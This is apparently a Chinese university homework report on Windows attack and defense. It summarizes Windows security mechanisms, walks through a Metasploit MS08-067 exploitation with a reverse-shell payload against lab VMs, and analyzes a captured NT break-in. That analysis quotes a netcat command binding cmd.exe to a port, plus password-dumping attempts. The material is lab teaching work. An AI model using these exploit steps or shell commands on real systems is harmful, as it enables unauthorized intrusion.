20212805 2021-2022-2 《网络攻防实践》第六次(第八周)作业
一、知识点梳理与总结
1.Windows操作系统基本结构
- Windows操作系统内核的基本模块包括:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。
- Windows操作系统在用户代码的代码模块包括:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
- Windows操作系统内核实现的核心机制:Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络机制。
2.Windows身份认证机制
- Windows账户分为用户,用户组,和计算机三大类,Windows用户账户的口令经过加密处理后被保存于SAM或者活动目录AD中,其中本地用户账户口令信息经过不可逆的128位随机密钥Hash加密后存储在SAM文件中。
3.Windows授权与访问控制机制
-
由内核中的SRM模块与用户态的LSASS服务共同实施。认证通过后,会赋予用户访问令牌。
-
Windows对于系统中所有需要保护的资源抽象成对象,关联一个SD安全描述符。其中指明了哪些主体可以以何种方式访问对象。
4.安全审计机制
- LSASS服务保存审计策略,SRM在进行对象访问授权时,也将审计记录发送给LSASS服务,再由EventLog服务进行写入记录。
5.其他安全机制
- 安全中心(防火墙、补丁、病毒防护),IPsec加载和验证机制,EPS加密文件系统,文件保护机制,捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制等。
6.Windows远程攻击技术分类
- 远程口令猜测与破解攻击
- 攻击Windows网络服务
- 攻击Windows客户端及用户
7.远程安全攻防
- 安全漏洞公开披露信息库:CVE,NVD,OSVDB,CNNVD等。
- 针对特定目标的渗透测试攻击过程:漏洞扫描,查找相应渗透代码,渗透测试(匹配环境等)。
- 远程口令猜测和破解攻击:SMB服务的用户口令猜测,利用身份认证协议的漏洞进行用户口令破解;防范措施:尽量关闭不必要的易受攻击的网络服务,配置防火墙对相应端口进行访问控制,设置强口令。
- 网络服务远程渗透攻击:对网络服务默认开放的端口进行攻击。防范措施:打补丁,在漏洞发布到补丁更新时尽量关闭相关端口网络服务。
8.本地安全攻防
- 获取受限账户后提权(DLL注入),获取adminstrator权限甚至local system权限。
- 敏感信息窃取:提取口令字密文,破解密文,窃取数据;防范措施:设置强口令,加密口令。
- 消踪灭迹:关闭审计功能,消除事件日志;防范措施将日志记录到不可擦除的设备中或备份至网络服务器。
- 设置后门:在受控主机中安装特定后门程序;防范措施:后门检测软件。
二、实践过程
2.1.(1)动手实践Metasploit windows attacker
使用kali攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
攻击机和靶机的IP地址
虚拟机 | IP |
---|---|
Kali(攻击机) | 192.168.13.69 |
Windows XP professional(靶机) | 192.168.13.77 |
首先在攻击机B上打开msf——msfconsole
搜索ms08-067漏洞,serach ms08_067
use exploit/windows/smb/ms08_067_netapi
,并使用options查看需要设置的选项
执行show payloads
查看可用的payload
执行show targets
查看可用的payload,查看这个漏洞波及的系统版本
这里使用命令set TARGET 0选择自动识别靶机
这里使用windows/shell/reverse_tcp,执行set payload windows/shell/reverse_tcp,反向连接来获取,并使用命令show options显示需要设置的参数
设置目标为靶机A的IP地址,执行set RHOSTS 192.168.13.77
设置本机set LHOST 192.168.13.69
使用命令exploit进行攻击
2.2.(2)取证分析实践:解码一次成功的NT系统破解攻击。
用Wireshark打开二进制文件,通过ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106对数据包进行过滤
可以发现靶机的操作系统为windows NT 5.0,并访问了http://lab.wiretrip.net/Default.htm
攻击机向靶机发送了大量的http get请求获取资源,第76行出现了default.asp文件(asp文件是微软的在服务器端运行的动态网页文件,通过IIS解析执行后可以得到动态页面)
第117行发现攻击者打开了系统启动文件boot.ini,使用ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106&& http(%C0%AF是/的Unicode编码)进行过滤,发现出现多次的msadcs.dll
对149号数据包进行追踪,发现攻击者利用漏洞进行了SQL注入攻击,并执行了命令cmd /c echo werd >> c:\fun,
同时!ADM!ROX!YOUR!WORLD!表明这是一个名为msadc2.pl的工具发起的攻击,使用的是RDS漏洞进行了SQL注入攻击
可以发现攻击者尝试建立FTP连接,通过追踪发现,这个连接由于口令错误导致连接失败
使用ftp进行过滤,发现1106号数据包成功建立了FTP连接
1224号数据包:发现攻击者执行了命令c+nc+-l+-p+6969+-e+cmd1.exe,表示攻击者连接了6969端口并且获得了访问权限
使用tcp.port == 6969进行过滤,发现攻击者先进行了查看文件和权限、删除脚本等常用操作
发现执行net session时权限受限,又执行net users发现该主机的用户列表只有Administrator
使用net group查看组用户、net localgroup查看本地组用户等命令以及通过pdump命令来破解口令密文都失败了
删除了samdump和pdump文件
为了消除被攻击的隐患,
应当:
1、及时扫描漏洞并修补;
2、禁用用不着的RDS等服务;
3、使用 NTFS 文件系统
由图中内容可知,攻击者知道他的目标是一台蜜罐主机
2.3(3)团队对抗实践:windows系统远程渗透攻击和分析
目标靶机是胡云深同学的电脑,首先确保可以ping通
使用metasploit选择漏洞ms08_067
进行攻击,获得控制权,得到胡云深同学电脑的ip,并在其c盘上建一个新文件夹:
由于截图没注意,出现一点小失误,这里截用云深电脑上用wireshark监听到的命令以作证明